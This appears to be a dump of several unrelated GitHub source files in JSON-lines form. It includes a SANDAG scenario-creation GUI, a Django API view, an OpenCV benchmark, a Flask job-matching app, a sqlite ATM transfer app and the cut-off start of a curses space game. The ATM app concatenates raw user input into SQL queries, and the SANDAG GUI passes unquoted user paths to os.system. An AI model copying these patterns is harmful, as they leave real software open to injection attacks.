blue').grid(row=current_row,columnspan=5)\r\n current_row += 1\r\n tkinter.Label(body, text=u\"Create an ABM Work Space\", font=(\"Helvetica\", 10, 'bold')).grid(row=current_row,columnspan=n_columns)\r\n current_row += 1\r\n self.yButton.grid(row=current_row,column=0, columnspan=n_columns-1)\r\n self.nButton.grid(row=current_row,column=1, columnspan=n_columns-1)\r\n current_row += 1\r\n\r\n tkinter.Label(body, text=u\"Study Folder\", font=(\"Helvetica\", 8, 'bold')).grid(row=current_row)\r\n self.studypath = tkinter.Entry(body, width=40)\r\n self.studypath.grid(row=current_row, column=1, sticky=sticky)\r\n self.studypath.delete(0, constants.END)\r\n self.studypath.insert(0, self.defaultScenarioDir)\r\n self.studybutton = tkinter.Button(body, text=u\"...\",width=4,command=lambda:self.get_path(\"study\"))\r\n self.studybutton.grid(row=current_row, column=n_columns-1)\r\n current_row += 1\r\n\r\n tkinter.Label(body, text=u\"Network Folder\",font=(\"Helvetica\", 8, 'bold')).grid(row=current_row)\r\n self.studynetworkpath = tkinter.Entry(body, width=40)\r\n self.studynetworkpath.grid(row=current_row, column=1, sticky=sticky)\r\n self.studynetworkpath.delete(0, constants.END)\r\n self.studynetworkpath.insert(0, self.defaultNetworkDir)\r\n self.studynetworkbutton = tkinter.Button(body, text=u\"...\",width=4,command=lambda: self.get_path(\"studynetwork\"))\r\n self.studynetworkbutton.grid(row=current_row, column=n_columns-1)\r\n self.selected_study_years = ''\r\n current_row += 1\r\n\r\n tkinter.Label(body, text=u\"Year Selection\",font=(\"Helvetica\", 8, 'bold')).grid(row=current_row)\r\n self.studyyears = tkinter.Entry(body, width=40)\r\n self.studyyears.grid(row=current_row, column=1, sticky=sticky)\r\n self.studyyears.delete(0, constants.END)\r\n self.studyyearsbutton = tkinter.Button(body, text=u\"...\",width=4,command=lambda: self.select_study_years())\r\n self.studyyearsbutton.grid(row=current_row, column=n_columns-1)\r\n current_row += 1\r\n \r\n self.copyButton = tkinter.Button(body, text=u\"Create\", font=(\"Helvetica\", 8, 'bold'),width=10, command=lambda: self.checkPath(\"study\"))\r\n self.copyButton.grid(row=current_row,column=0,columnspan=n_columns+1)\r\n current_row += 1\r\n\r\n tkinter.Label(body, text=divider, font=(\"Helvetica\", 11, 'bold'), width=50, fg='royal blue').grid(row=current_row,columnspan=n_columns+2)\r\n current_row += 1\r\n tkinter.Label(body, text=u\"Create an ABM scenario\", font=(\"Helvetica\", 10, 'bold')).grid(row=current_row,columnspan=n_columns)\r\n current_row += 1\r\n\r\n #tkinter.Label(body, text=u\"Version\", font=(\"Helvetica\", 8, 'bold')).grid(row=8)\r\n #var = StringVar(root)\r\n self.version=\"version_14_3_0\"\r\n #optionList=[\"version_14_2_2\"]\r\n #option=tkinter.OptionMenu(body,var,*optionList,command=self.setversion)\r\n #option.config(width=50)\r\n #option.grid(row=8, column=1)\r\n\r\n tkinter.Label(body, text=u\"Emme Version\", font=(\"Helvetica\", 8, 'bold')).grid(row=current_row)\r\n var = tkinter.StringVar(root)\r\n #self.emme_version = \"4.4.4.1\"\r\n optionList = [\"4.3.7\"]\r\n var.set(self.emme_version)\r\n option = tkinter.OptionMenu(body, var, *optionList, command=self.setEmmeVersion)\r\n option.config(width=50)\r\n option.grid(row=current_row, column=1)\r\n current_row += 1\r\n\r\n tkinter.Label(body, text=u\"Year\", font=(\"Helvetica\", 8, 'bold')).grid(row=current_row)\r\n var = tkinter.StringVar(root)\r\n #self.year=\"2016\"\r\n #yearOptionList = [\"2016\", \"2020\", \"2023\", \"2025\", \"2025nb\", \"2026\", \"2029\", \"2030\", \"2030nb\", \"2032\", \"2035\", \"2035nb\", \"2040\", \"2040nb\", \"2050\",\"2050nb\"]\r\n #if self.select_lu:\r\n var.set(self.year)\r\n #else:\r\n # var.set(\"Select Year\")\r\n option=tkinter.OptionMenu(body,var,*yearOptionList,command=self.setyear)\r\n option.config(text = self.year)\r\n option.config(width=50)\r\n option.grid(row=current_row, column=1)\r\n current_row += 1\r\n #option.pack(expand = True)\r\n\t\t\t\r\n tkinter.Label(body, text=u\"Land Use\", font=(\"Helvetica\", 8, 'bold')).grid(row=current_row)\r\n #self.lu=\"DS41\"\r\n #if self.select_lu:\r\n var = tkinter.StringVar(root)\r\n var.set(self.lu + '-' + self.lu_options[self.lu][\"name\"])\r\n #if self.year in self.invalid_combos[\"DS42\"]:\r\n # luOptionList = [\"DS41-Baseline\"]\r\n #elif self.year in self.invalid_combos[\"DS41\"]:\r\n # luOptionList = [\"DS42-Sustainable Community Strategy\"]\r\n #else:\r\n # luOptionList = [\"DS41-Baseline\", \"DS42\"]\r\n luOptionList = []\r\n for lu in self.lu_options:\r\n if self.year in self.lu_options[lu][\"years\"]:\r\n luOptionList.append(lu + '-' + self.lu_options[lu][\"name\"])\r\n option=tkinter.OptionMenu(body,var,*luOptionList,command=self.setLU)\r\n\r\n option.config(width=50)\r\n option.grid(row=current_row, column=1)\r\n current_row += 1\r\n\r\n tkinter.Label(body, text=u\"Geography ID\", font=(\"Helvetica\", 8, 'bold')).grid(row=current_row)\r\n #self.geo=\"1\"\r\n self.geo = tkinter.Entry(body, width=40)\r\n self.geo.grid(row=current_row, column=1, sticky=sticky)\r\n self.geo.delete(0, constants.END)\r\n self.geo.insert(0, 1)\r\n current_row += 1\r\n #option.pack(expand = True)\r\n\t\t\t\r\n tkinter.Label(body, text=u\"Scenario Folder\", font=(\"Helvetica\", 8, 'bold')).grid(row=13)\r\n self.scenariopath = tkinter.Entry(body, width=40)\r\n self.scenariopath.grid(row=current_row, column=1, sticky=sticky)\r\n button = tkinter.Button(body, text=u\"...\",width=4,command=lambda: self.get_path(\"scenario\"))\r\n button.grid(row=current_row, column=2)\r\n current_row += 1\r\n\r\n tkinter.Label(body, text=u\"Network Folder\",font=(\"Helvetica\", 8, 'bold')).grid(row=14)\r\n self.networkpath = tkinter.Entry(body, width=40)\r\n self.networkpath.grid(row=current_row, column=1, sticky=sticky)\r\n button = tkinter.Button(body, text=u\"...\",width=4,command=lambda: self.get_path(\"network\"))\r\n button.grid(row=current_row, column=2)\r\n current_row += 1\r\n\r\n buttons = tkinter.Frame(self)\r\n buttons.pack()\r\n botton = tkinter.Button(buttons, text=u\"Create\", font=(\"Helvetica\", 8, 'bold'),width=10, command=lambda: self.checkPath(\"scenario\"))\r\n botton.pack(side=constants.LEFT)\r\n #botton.grid(row=13, column = 0)\r\n tkinter.Frame(buttons, width=10).pack(side=constants.LEFT)\r\n button = tkinter.Button(buttons, text=u\"Quit\", font=(\"Helvetica\", 8, 'bold'), width=10, command=self.quit)\r\n button.pack(side=constants.RIGHT)\r\n #button.grid(row = 13, columns = 2)\r\n\r\n self.defaultpath=self.releaseDir+\"\\\\\"+self.version+'\\\\input\\\\'+self.year\r\n self.scenariopath.delete(0, constants.END)\r\n self.scenariopath.insert(0, self.defaultScenarioDir)\r\n self.networkpath.delete(0, constants.END)\r\n self.networkpath.insert(0, self.defaultpath)\r\n\r\n self.initStudy()\r\n\r\n def initStudy(self):\r\n #disable study setting buttons\r\n if self.buttonVar.get()==1:\r\n self.studypath.config(state=tkinter.NORMAL)\r\n self.studybutton.config(state=tkinter.NORMAL)\r\n self.studynetworkpath.config(state=tkinter.NORMAL)\r\n self.studynetworkbutton.config(state=tkinter.NORMAL)\r\n self.studyyears.config(state=tkinter.NORMAL)\r\n self.studyyearsbutton.config(state=tkinter.NORMAL)\r\n self.copyButton.configure(state=tkinter.NORMAL)\r\n #enable study setting buttons\r\n elif self.buttonVar.get()==0:\r\n self.studypath.config(state=tkinter.DISABLED)\r\n self.studybutton.config(state=tkinter.DISABLED)\r\n self.studynetworkpath.config(state=tkinter.DISABLED)\r\n self.studynetworkbutton.config(state=tkinter.DISABLED)\r\n self.studyyears.config(state=tkinter.DISABLED)\r\n self.studyyearsbutton.config(state=tkinter.DISABLED)\r\n self.copyButton.configure(state=tkinter.DISABLED)\r\n\r\n #set default input and network paths based on selected year\r\n def setversion(self,value):\r\n self.version=value\r\n return\r\n\r\n # set Emme version\r\n def setEmmeVersion(self, value):\r\n self.emme_version = value\r\n return\r\n\r\n #set default input and network paths based on selected year\r\n def setyear(self,value):\r\n self.year=value\r\n #Refresh the GUI with inputs already entered\r\n self.destroy()\r\n CreateScenarioGUI(self.root, self.emme_version, self.year, self.geo, self.lu).pack(fill=constants.X, expand=1)\r\n return\r\n\r\n # set Geography Set ID\r\n def setgeo(self, value):\r\n self.geo = value\r\n return\r\n\r\n # set land use\r\n def setLU(self,value):\r\n self.lu = value.split(\"-\")[0]\r\n return\r\n\r\n #set cluster\r\n def setcluster(self,value):\r\n self.cluster=value\r\n return\r\n\r\n #set default options for folded browsers\r\n def setPathOptions(self):\r\n self.dir_opt = options = {}\r\n options['initialdir'] = self.defaultScenarioDir\r\n options['mustexist'] = False\r\n options['parent'] = root\r\n options['title'] = 'This is a title'\r\n\r\n #get a path after the browse button is clicked on\r\n def get_path(self,type):\r\n self.setPathOptions()\r\n path = filedialog.askdirectory(**self.dir_opt)\r\n if type==\"scenario\":\r\n if path:\r\n spath = os.path.normpath(path)\r\n self.scenariopath.delete(0, constants.END)\r\n self.scenariopath.insert(0, spath)\r\n elif type==\"network\":\r\n if path:\r\n npath = os.path.normpath(path)\r\n self.networkpath.delete(0, constants.END)\r\n self.networkpath.insert(0, npath)\r\n elif type==\"study\":\r\n if path:\r\n studypath = os.path.normpath(path)\r\n self.studypath.delete(0, constants.END)\r\n self.studypath.insert(0, studypath)\r\n elif type==\"studynetwork\":\r\n if path:\r\n studynetworkpath = os.path.normpath(path)\r\n self.studynetworkpath.delete(0, constants.END)\r\n self.studynetworkpath.insert(0, studynetworkpath)\r\n return\r\n\r\n #check if a path already exisits or is empty\r\n def checkPath(self,type):\r\n self.popup=tkinter.Tk()\r\n if type==\"scenario\":\r\n #Check if invalid year/land use combo and don't create scenario if that is the case\r\n #if self.year not in self.lu_options[self.lu][\"years\"]: \r\n # showerror(\"Error\", \"Invalid year/land use combination\")\r\n # return\r\n if os.path.exists(self.scenariopath.get()):\r\n if not self.networkpath.get():\r\n popupMsg.popupmsg(self,\"Network folder is empty!\",1,type)\r\n else:\r\n popupMsg.popupmsg(self,\"Selected scenario folder already exists! Proceeding will overwrite existing files!\",2,type)\r\n else:\r\n if not self.scenariopath.get():\r\n popupMsg.popupmsg(self,\"Scenario folder is empty!\",1,type)\r\n elif not self.networkpath.get():\r\n popupMsg.popupmsg(self,\"Network folder is empty!\",1,type)\r\n else:\r\n self.executeBatch(type)\r\n elif type==\"study\":\r\n if os.path.exists(self.studypath.get()):\r\n if not self.studynetworkpath.get():\r\n popupMsg.popupmsg(self,\"Network folder is empty!\",1,type)\r\n else:\r\n popupMsg.popupmsg(self,\"Selected study folder already exists! Proceeding will overwrite existing files!\",2,type)\r\n else:\r\n if not self.studypath.get():\r\n popupMsg.popupmsg(self,\"Study folder is empty!\",1,type)\r\n elif not self.studynetworkpath.get():\r\n popupMsg.popupmsg(self,\"Network folder is empty!\",1,type)\r\n else:\r\n self.executeBatch(type)\r\n return\r\n\r\n def select_study_years(self):\r\n selection_root = tkinter.Tk()\r\n SelectStudyYears(selection_root, self).pack(fill=constants.X, expand=1)\r\n\r\n #Update properties file\r\n def update_property(self, old, new):\r\n property_file = os.path.join(self.scenariopath.get(), 'conf', 'sandag_abm.properties')\r\n property_file = property_file.replace('\\\\\\\\', '/')\r\n with open(property_file, 'r') as file :\r\n filedata = file.read()\r\n filedata = filedata.replace(old, new)\r\n with open(property_file, 'w') as file:\r\n file.write(filedata)\r\n\r\n #execute DOS commands\r\n def executeBatch(self, type):\r\n self.popup.destroy()\r\n if type==\"scenario\":\r\n commandstr = u\"create_scenario.cmd %s %s %s %s\" % (\r\n self.scenariopath.get(),\r\n self.year,\r\n self.networkpath.get(),\r\n self.emme_version\r\n )\r\n os.chdir(self.releaseDir+\"\\\\\"+self.version+'\\\\')\r\n os.system(commandstr)\r\n #self.update_property(\"version=version_14_2_2\", \"version=version_14_2_2\\nLU version=\" + self.lu)\r\n self.update_property(\"version=version_14_3_0\", \"version=version_14_3_0\\nLU version=\" + self.lu)\r\n self.update_property(\"geographyID=1\", \"geographyID=\" + self.geo.get())\r\n elif type==\"study\":\r\n studyyears = self.studyyears.get().split(',')\r\n exclude_file = self.studynetworkpath.get() + '\\\\exclude.txt'\r\n exclude = [\"exclude.txt\", \"\\\\2050_vision_nopurple\\\\\"]\r\n for year in self.studyYearList:\r\n if year not in studyyears:\r\n exclude.append(\"\\\\\" + year + \"\\\\\")\r\n f = open(exclude_file, 'w')\r\n f.write('\\n'.join(exclude))\r\n f.close()\r\n commandstr=u\"copy_networkfiles_to_study.cmd \"+self.studypath.get()+\" \"+self.studynetworkpath.get()\r\n print(commandstr)\r\n os.chdir(self.releaseDir+\"\\\\\"+self.version+'\\\\')\r\n os.system(commandstr) \r\n os.remove(exclude_file)\r\n self.popup=tkinter.Tk()\r\n msg=\"You have successfully created the \"+ type+\"!\"\r\n popupMsg.popupmsg(self,msg,1,type)\r\n return\r\n\r\nroot = tkinter.Tk()\r\nroot.resizable(True, False)\r\nroot.minsize(370, 0)\r\nlogo = tkinter.PhotoImage(file=r\"T:\\ABM\\release\\ABM\\SANDAG_logo.gif\")\r\nw=tkinter.Label(root, image=logo, width=200)\r\nw.pack(side='top', fill='both', expand='yes')\r\nCreateScenarioGUI(root).pack(fill=constants.X, expand=1)\r\nroot.mainloop()","repo_name":"camsys/SANDAG-ABM","sub_path":"src/main/python/pythonGUI/createStudyAndScenario.py","file_name":"createStudyAndScenario.py","file_ext":"py","file_size_in_byte":20429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"26201905813","text":"from django.shortcuts import get_object_or_404\nfrom drf_yasg.utils import swagger_auto_schema\n\nfrom ..models import Study\nfrom ..serializers.schedule_of_study_sz import ScheduleOfStudySerializer\n\nfrom ...schedule.serializers.schedule_sz import ScheduleSerializer\n\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\n\n## ---스케줄---\nclass StudySchedule(APIView):\n @swagger_auto_schema(\n responses={200: ScheduleOfStudySerializer()},\n tags=['schedules'],\n operation_description=\n \"\"\"\n 스터디의 schedule 목록\n\n ---\n 정렬사항 \n - datetime의 역순으로 정렬\n\n 요청사항\n - study_id : 스터디의 id\n \"\"\",\n )\n def get(self, request, *args, **kwargs):\n print(\"StudySchedule\")\n study_schedule = self.get_object(self.kwargs['studies_id'])\n print(study_schedule)\n serializer = ScheduleOfStudySerializer(study_schedule)\n print(serializer)\n return Response(data=serializer.data)\n\n @swagger_auto_schema(\n request_body=ScheduleSerializer,\n responses={201: ScheduleSerializer()},\n tags=['schedules'],\n operation_description=\n \"\"\"\n 스케줄 생성 API\n\n ---\n 요청사양\n - study : 스터디 id\n - datetime : 일정 날짜 YY-MM-DDTHH:MM\n - place : 장소\n - description : 일정 소개 \n \"\"\",\n )\n def post(self, request, *args, **kwargs):\n serializer = ScheduleSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(data=serializer.data)\n return Response(data=serializer.error)\n\n def get_object(self, pk):\n return get_object_or_404(Study, pk=pk)\n","repo_name":"wisestudy/wisestudy-server","sub_path":"api/study/views/study_schedule.py","file_name":"study_schedule.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73864340307","text":"import numpy as np\nimport time\nimport csv\nimport cv2\n\n\n## Define the model parameters\n\npb = \"/home/victor/Projects/Thesis/Models/ssd_mobilenet_v1_coco.pb\"\npbtxt = \"/home/victor/Projects/Thesis/Models/ssd_mobilenet_v1_coco.pbtxt\"\nconf = 0.4\n\n\n## Set source file parameters and prepare the VideoCapture\n\n# filename = \"TestSeq1.mp4\"\n\n# folder = \"../Footage\"\nfolder = \"/home/victor/Projects/Footage/Clips1/00:00:30.442.mp4\"\n\ncap = cv2.VideoCapture()\nvid = cap.open(folder)\nframeCount = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\n\n## Load the serialized model from disk\n\nprint(\"[INFO] loading model...\")\nnet = cv2.dnn.readNetFromTensorflow(pb, pbtxt)\n\n\n## Start the timekeeping to calculate model speed\n\nstart = time.time()\n\n\n## Main loop over the video file\n\nwhile True:\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n # Prevent crash at the end of the video file\n if not ret:\n break\n\n # Get the frame dimensions for later on\n (h, w) = frame.shape[:2]\n\n # Create a blob from the source frame by resizing to the required 300x300 size\n blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)), 0.007843, (300, 300), 127.5)\n\n # Feed blob to the net and perform a forward pass\n net.setInput(blob)\n detections = net.forward()\n\n print(detections)\n\n # loop over the detections\n # for i in np.arange(0, detections.shape[2]):\n # # extract the confidence (i.e., probability) associated with the prediction\n # confidence = detections[0, 0, i, 2]\n #\n # # filter out weak detections by ensuring the `confidence` is greater than the minimum confidence\n # if confidence > conf:\n #\n # # Compute the (x, y)-coordinates of the bounding box for the object\n # box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n # (startX, startY, endX, endY) = box.astype(\"int\")\n #\n # # display the prediction\n # label = \"{:.2f}%\".format(confidence * 100)\n # cv2.rectangle(frame, (startX, startY), (endX, endY), (0, 255, 0), 2)\n # y = startY - 15 if startY - 15 > 15 else startY + 15\n # cv2.putText(frame, label, (startX, y), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n\n # Display the resulting frame\n cv2.line(frame, (0, 360), (1280, 360), (0, 0, 0), 2)\n cv2.imshow('frame', frame)\n\n # Wait for q key to be pressed to stop the program\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Calculate end time and print the speed benchmark results\nend = time.time()\nprint(\"[INFO] it took %s seconds.\" % (end - start))\nprint(\"[INFO] clip has %s frames\" % frameCount)\nprint(\"[INFO] that makes %s fps\" % (frameCount / (end - start)))\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()","repo_name":"thepycoder/Thesis","sub_path":"Testing/MobileNetTensorflow.py","file_name":"MobileNetTensorflow.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1872822202","text":"from model.series import Series\n\n\nclass TestSeriesBuilder:\n\n def __init__(self, data, interval=1, unit='s'):\n self.unit = unit\n self.interval = interval\n self.data = data\n\n def assert_same_units(self, other):\n if self.unit != other.unit or self.interval != other.interval:\n raise ValueError('Unit/interval mismatch')\n\n def append(self, test_series, piecewise=False):\n self.assert_same_units(test_series)\n last_index = self.data[-1][0] + 1\n first_new_index = test_series.data[0][0]\n if piecewise:\n piecewise_diff = self.data[-1][1] - test_series.data[0][1]\n else:\n piecewise_diff = 0\n for e in test_series.data:\n new_index = last_index + e[0] - first_new_index\n entry = e[1] + piecewise_diff\n self.data.append([new_index, entry])\n\n def compose(self, test_series):\n self.assert_same_units(test_series)\n for i in range(len(self.data)):\n index = self.data[i][0]\n self.data[i] = [index, self.data[i][1] + test_series.data[i][1]]\n\n def build(self):\n return Series.from_array(self.data, self.unit)\n\n @staticmethod\n def constant(length, value=0, interval=1, unit='s'):\n return TestSeriesBuilder.linear(length, value, 0, interval, unit)\n\n @staticmethod\n def linear(length, startvalue, slope, interval=1, unit='s', start_time=0):\n data = []\n for i in range(length):\n data.append([(i*interval)+start_time, startvalue + slope*i*interval])\n return TestSeriesBuilder(data, interval, unit)\n","repo_name":"GNico/ts-analysis","sub_path":"backend/ts_project/salib/model/test/test_series_builder.py","file_name":"test_series_builder.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8313744752","text":"from tkinter import*\nfrom tkinter import messagebox\nimport sqlite3\nfrom PIL import ImageTk, Image\n\nwin=Tk()\nwin.geometry(\"550x500\")\nwin.resizable(False,False)\nwin.title(\"Welcome to the transfer\")\nload=Image.open('tra.jpg')\nrender=ImageTk.PhotoImage(load)\nimg=Label(win,image=render)\nimg.place(x=0,y=0)\n\ndef transfer():\n #a=str(num1.get())\n #b=str(num2.get())\n #c=str(num3.get())\n #d=str(num4.get())\n #e=str(num5.get())\n atmtype=\"Transfer\"\n conn = sqlite3.connect(database=r'bank.db')\n mydb=conn.cursor()\n try:\n mydb.execute(\"insert into type(card_number,amount,type) values ('\"+num1.get()+\"','\"+num3.get()+\"','\"+atmtype+\"')\")\n mydb.execute(\"update deposit set amount = amount - '\"+num3.get()+\"' where pin='\"+num2.get()+\"'\")\n mydb.execute(\"insert into bank(card_number_to,pin,amount) values ('\"+num4.get()+\"','\"+num2.get()+\"','\"+num3.get()+\"')\")\n conn.commit()\n messagebox.showinfo(\"Message\",\"Transfed\")\n except:\n messagebox.showerror(\"Error\",\"Check your Details\")\n conn.close()\n\nlb=Label(win,text=\"Enter Card Number From\",font=20,width=25).grid(row=0,column=0,padx=20,pady=20)\n\nlb2=Label(win,text=\"Enter Pin\",font=20,width=10).grid(row=1,column=0,padx=20,pady=20)\n\nlb3=Label(win,text=\"Enter Amount\",font=20,width=15).grid(row=2,column=0,padx=20,pady=20)\n\nlb4=Label(win,text=\"Enter Card Number To\",font=20,width=20).grid(row=3,column=0,padx=20,pady=20)\n\nlb5=Label(win,text=\"Enter IFSC\",font=20,width=10).grid(row=4,column=0,padx=20,pady=20)\n\nnum1=StringVar()\ntx=Entry(win,font=10,width=20,textvariable=num1).grid(row=0,column=1)\nnum2=StringVar()\ntx2=Entry(win,font=10,width=20,textvariable=num2).grid(row=1,column=1)\nnum3=StringVar()\ntx3=Entry(win,font=10,width=20,textvariable=num3).grid(row=2,column=1)\nnum4=StringVar()\ntx4=Entry(win,font=10,width=20,textvariable=num4).grid(row=3,column=1)\nnum5=StringVar()\ntx5=Entry(win,font=10,width=20,textvariable=num5).grid(row=4,column=1)\n\nbtn=Button(win,text=\"Transfer\",command=transfer,relief=\"raised\",bd=10,font=20,highlightbackground=\"blue\",highlightthickness=10).place(x=220,y=370)\n\nwin.mainloop()\n","repo_name":"madhavsharma7/Atm-on-sqlite3","sub_path":"transfer3.py","file_name":"transfer3.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21262885514","text":"'''\nReferences:\nhttps://getbootstrap.com/docs/5.1/examples/\nhttps://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.read_pickle.html \nhttps://towardsdatascience.com/how-to-easily-deploy-machine-learning-models-using-flask-b95af8fe34d4\n'''\n\nfrom flask import Flask, render_template, request, redirect\nimport pandas as pd\nimport nltk\nfrom nltk.corpus import sentiwordnet as swn\nfrom bs4 import BeautifulSoup\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n\n\n\napp = Flask(__name__)\n\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef home():\n return render_template(\"index.html\")\n\n@app.route(\"/methodology/\")\ndef methodology():\n return render_template(\"methodology.html\") \n\n \n@app.route(\"/matches/\", methods = ['GET', 'POST'])\ndef matches():\n req_type = request.method\n form_data = request.form\n resID = request.form['ResumeID']\n print(resID)\n # resID = 17812897\n topN = request.form['TopN']\n print(topN)\n # topN = 10\n df_matches = get_matches(resID, topN)\n # return df_matches\n return render_template(\"matches.html\", tables=[df_matches.to_html(classes='data')], titles=df_matches.columns.values)\n\n\n\n \n'''\ndef get_outlook():\n data_outlook = pd.read_pickle('cleaned_outlook_corpus.pkl')\n df_o = pd.DataFrame(data_outlook)\n df_o_head = df_o.head()\n df_o_head = df_o_head[['O*NET-SOC Code', 'Title', 'outlook_pred']]\n return df_o_head\n'''\n\ndef get_recommendation(top, occupation_match, scores):\n recommendation = pd.DataFrame(columns = ['JobID', 'title', 'score', 'sentiment'])\n count = 0\n print(top)\n print(occupation_match)\n for i in top:\n # recommendation.at[count, 'ID'] = resID\n recommendation.at[count, 'JobID'] = occupation_match['O*NET-SOC Code'][i]\n recommendation.at[count, 'title'] = occupation_match['title'][i]\n recommendation.at[count, 'score'] = scores[count]\n recommendation.at[count, 'sentiment'] = occupation_match['outlook_pred'][i]\n count += 1\n return recommendation\n\n\n\ndef cos_similarity(df_res, df_occu, topX):\n # Feature extraction\n tfidf_vectorizer = TfidfVectorizer()\n tfidf_occupations = tfidf_vectorizer.fit_transform((df_occu['cleaned_text'])) \n tfidf_resumes = tfidf_vectorizer.transform(df_res['Resume_str_cleaned']) \n \n #Cosine similarity\n cos_similarity_tfidf = map(lambda x: cosine_similarity(tfidf_resumes, x),tfidf_occupations)\n \n # Convert the cosine similarities into a list\n r = list(cos_similarity_tfidf)\n\n # Top 10 occupational recommendations\n top = sorted(range(len(r)), key=lambda i: r[i], reverse=True)[:int(topX)]\n list_scores = [r[i][0][0] for i in top]\n data = pd.read_pickle('cleaned_outlook_corpus.pkl')\n occupations_new = pd.DataFrame(data)\n df_rec = get_recommendation(top, occupations_new, list_scores)\n return df_rec\n\n\ndef get_matches(resumeID, topNoccs):\n data_resume = pd.read_pickle('cleaned_resume_corpus.pkl')\n df_r = pd.DataFrame(data_resume)\n print(type(resumeID))\n print(df_r.dtypes)\n print(df_r.head())\n df_resume = df_r[df_r['ID']==int(resumeID)]\n print(df_resume)\n data_occs = pd.read_pickle('cleaned_outlook_corpus.pkl')\n df_occs = pd.DataFrame(data_occs)\n print(df_occs)\n job_matches = cos_similarity(df_resume, df_occs, topNoccs)\n return job_matches\n\n\n'''\ndata = pd.read_pickle('cleaned_outlook_corpus.pkl')\ndata_frame = pd.DataFrame(data)\nprint(data_frame.head())\n'''\n\n","repo_name":"llwasson/llwasson_nlp_final2","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29135966821","text":"from typing import List, NamedTuple, Tuple\nimport time\nimport random\nfrom random import randint\nimport curses\nfrom itertools import cycle\nimport asyncio\n\nfrom curses_tools import draw_frame\nfrom curses_tools import read_controls\n\nfrom space_garbage import TRASH_FRAMES\nfrom space_garbage import fly_garbage\nfrom physics import update_speed\nfrom fire_animation import fire\n\n\nSTAR_SYMBOLS = ('+', '*', '.', ':')\nANIMATION_DELAY = 0.1\nMAX_STAR_DELAY = 50\nSPACE_FRAME_FILES = ('spaceFrames/frame_0.txt', 'spaceFrames/frame_1.txt')\nBORDER_SIZE = 1\n\nGAME_OVER_FRAME = 'otherFrames/game_over.txt'\nONE_YEAR_DURATION_IN_SECONDS = 1.5\n\nPHRASES = {\n 1957: \"First Sputnik\",\n 1961: \"Gagarin flew!\",\n 1969: \"Armstrong got on the moon!\",\n 1971: \"First orbital space station Salute-1\",\n 1981: \"Flight of the Shuttle Columbia\",\n 1998: 'ISS start building',\n 2011: 'Messenger launch to Mercury',\n 2020: \"Take the plasma gun! Shoot the garbage!\",\n}\n\n\ndef load_space_frames(frame_files=SPACE_FRAME_FILES) -> List[str]:\n result = []\n for path in frame_files:\n with open(path) as f:\n result += [''.join(f.readlines())] * 2\n return result\n\n\nclass Extent(NamedTuple):\n dx: int\n dy: int\n\n\ndef load_game_over_frame(frame_file=GAME_OVER_FRAME):\n lines = []\n with open(frame_file, 'r') as f:\n for line in f:\n line = line.rstrip()\n lines.append(line)\n return lines\n\n\ndef get_space_frame_size(frame_files=SPACE_FRAME_FILES) -> Extent:\n max_x, max_y = 0, 0\n for path in frame_files:\n with open(path) as f:\n lines = f.readlines()\n max_line_size = max((len(x.rstrip()) for x in lines))\n max_y = max(max_y, len(lines))\n max_x = max(max_x, max_line_size)\n return Extent(max_x, max_y)\n\n\nasync def sleep(ticks=1):\n for i in range(ticks):\n await asyncio.sleep(0)\n\n\nasync def star_blink(canvas, y_pos: int, x_pos: int, start_delay: int,\n symbol='*'):\n await sleep(start_delay)\n while True:\n canvas.addstr(y_pos, x_pos, symbol, curses.A_DIM)\n await sleep(20)\n canvas.addstr(y_pos, x_pos, symbol)\n await sleep(3)\n canvas.addstr(y_pos, x_pos, symbol, curses.A_BOLD)\n await sleep(5)\n canvas.addstr(y_pos, x_pos, symbol)\n await sleep(3)\n\n\nclass MyGame:\n def __init__(self):\n self.canvas = None\n\n self.space_frames = load_space_frames()\n self.space_frame_size = get_space_frame_size()\n self.game_over_frame = load_game_over_frame()\n self.space_x_speed = 0\n self.space_y_speed = 0\n self.space_coords = (0, 0)\n self.is_shot = False\n self.coroutines = []\n self.obstacles = dict()\n self.destroyed_obstacle_ids = set()\n self.is_space_died = False\n self.current_year = 1957\n\n self.__additional_canvas = None\n\n @property\n def window_size(self) -> Extent:\n height, width = self.canvas.getmaxyx()\n return Extent(width, height)\n\n @property\n def canvas_center_coords(self) -> Tuple[int, int]:\n height, width = self.canvas.getmaxyx()\n x_max = width - 1\n y_max = height - 1\n return x_max // 2, y_max // 2\n\n @property\n def garbage_delay_tics(self) -> int:\n if self.current_year < 1961:\n return -1\n elif self.current_year < 1969:\n return 20\n elif self.current_year < 1981:\n return 14\n elif self.current_year < 1995:\n return 10\n elif self.current_year < 2010:\n return 8\n elif self.current_year < 2020:\n return 6\n else:\n return 2\n\n def generate_stars(self) -> dict:\n window_extent = self.window_size\n x_max, y_max = window_extent.dx - 1, window_extent.dy - 1\n min_stars_count = x_max * y_max // 20\n max_stars_count = x_max * y_max // 10\n\n stars = dict()\n for _ in range(randint(min_stars_count, max_stars_count)):\n x = random.randint(BORDER_SIZE, x_max - BORDER_SIZE)\n y = random.randint(BORDER_SIZE, y_max - BORDER_SIZE)\n if (x, y) not in 